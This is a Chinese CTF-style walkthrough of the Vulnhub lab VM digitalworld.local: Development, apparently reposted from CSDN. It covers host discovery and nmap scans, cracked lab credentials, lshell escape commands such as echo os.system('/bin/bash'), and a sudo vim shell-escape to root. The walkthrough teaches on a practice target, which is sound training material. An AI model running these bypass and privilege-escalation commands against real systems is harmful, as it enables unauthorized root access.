Vulnhub靶机：DIGITALWORLD.LOCAL_ DEVELOPMENT

编程语言 2023-06-05 09:48:51 阅读次数: 0

目录

介绍
信息收集
- 主机发现
- 主机信息探测
网站探测
SSH登录
- lshell绕过
- sudo提权

介绍

系列：digitalworld.local（此系列共9台）
发布日期：2018 年 12 月 28 日
难度：中级
运行环境：Virtualbox运行失败，VMware运行成功
目标：取得 root 权限
备注：OSCP类型靶机，靶机容易崩溃
学习：

主机发现
端口扫描+漏洞扫描
错误信息泄露
破解hash
lshell绕过
sudo提权

靶机地址：https://www.vulnhub.com/entry/digitalworldlocal-development,280/

信息收集

主机发现

netdiscover主机发现

sudo netdiscover -i eth0 -r 192.168.229.0/24

主机信息探测

nmap -p- 192.168.229.138
nmap -p 22,113,139,445,8080 -A 192.168.229.138
nmap -p 22,113,139,445,8080 --script=vuln 192.168.229.138

在这里插入图片描述

靶机的smb服务似乎存在漏洞，找了下漏洞介绍，发现此漏洞可能导致执行任意指令或导致系统蓝屏死机。那就算了吧，尝试连接smb服务，发现需要密码才行。
在这里插入图片描述

网站探测

访问靶场，看到如下提示，得知靶机运行着一个入侵检测系统在这里插入图片描述

查看页面源代码提示了一个秘密页面“development”，和一个名字“Patrick”
在这里插入图片描述

那就先访问一下提示的页面“ html_pages”，发现了所谓的秘密页面“development.html”
在这里插入图片描述

访问秘密页面，得到如下提示，看来我们可以访问：./developmentsecretpage，这似乎是我们的秘密页面
在这里插入图片描述

最终，来到了一个登录页面
在这里插入图片描述

随便输个账号密码，出现报错。谷歌搜索一下直接发现了漏洞利用代码
在这里插入图片描述

在这里插入图片描述

测试漏洞利用代码成功，找个网站破解一下，得到3组账号密码：

intern		12345678900987654321
patrick		P@ssw0rd25
qiu			qiu

在这里插入图片描述

在这里插入图片描述

SSH登录

lshell绕过

登录时，提示使用?或者help查看可以执行的命令，检查后发现自己的shell是lshell，可以使用如下命令绕过

echo os.system('/bin/bash')
echo && 'bash'

在这里插入图片描述

sudo提权

直接sudo提权：https://gtfobins.github.io/gtfobins/vim/#sudo

sudo vim -c ':!/bin/sh'

在这里插入图片描述

猜你喜欢

转载自blog.csdn.net/weixin_44288604/article/details/128657746

Vulnhub靶机：DIGITALWORLD.LOCAL_ DEVELOPMENT

DynamoDB Local for Desktop Development

digitalworld.local:Torment Vulnhub Walkthrough

digitalworld.local: MERCY靶机入侵

digitalworld.local: JOY靶机-Walkthrough

Development Notes

Java Development

Development Enviroment

Development desciptor

web development

MTK CAMERA Development

ABAP+Development

Setting up development environment

Kony Development Cloud

IOS App development tools

iOS Development Tips

Android User Interface Development

Windchill UI development technologies

Zipline Development Guidelines

Some good tips for development

development, Theater Movie update

Getting Started with mongoDB Development

Agile Development 资源

CRMOD Integration Development Tips

Python Development Enviroment

Web Development : Cache、MQ

Development Model : 迭代式

OPC UA Development

Centos Development Tools 安装

linux Development Tools安装

今日推荐

基于大语言模型的开源知识库问答系统 MaxKB GitHub Star 数量突破 5,000 个！

美国拟限制 AI 大模型出口中国和俄罗斯

苹果将与 OpenAI 达成协议，将 ChatGPT 应用于 iPhone

openKylin 社区生态委员会第六次会议圆满召开

阿里云正式发布通义千问 2.5

Python 3.13 发布首个 Beta：实验性自由线程模式和 JIT、改进交互式解释器

Stack Overflow 拿我的代码去训练 AI 大模型，还封了我的账号

Pop!_OS 的 COSMIC 桌面完成 App Store 上架工作

报告：Django 仍然是 74% 开发者的首选

《2024 年一季度互联网投融资运行情况》研究报告

15 年前上了“FFmpeg 耻辱柱”，今天他还得谢谢咱——腾讯QQPlayer一雪前耻？

TIOBE 5 月榜单：Fortran “复活”进入 Top 10

周排行

BPM为企业带来的实际利益

好程序员web前端分享css常用属性缩写

Java文件下载（excel）

css样式的动态添加及显示和隐藏等零碎用法

axios全局配置以及拦截器

使用Logstash来实时同步MySQL和log日志数据到ES

C++获取当前时间（年月日、时分秒、毫秒）

Odoo产品分析 (四) -- 工具板块(11) -- 网站即时聊天(1)

Java环境配置正确，但是java、javac、java -version均返回“不是内部或外部命令，也不是可运行的程序或批处理文件”？

01 官网下载各种CentOS教程（超详细版）

每日归档

更多

2024-05-14(0)

2024-05-13(18)

2024-05-12(0)

2024-05-11(38)

2024-05-10(38)

2024-05-09(35)

2024-05-08(42)

2024-05-07(14)

2024-05-06(40)

2024-05-05(0)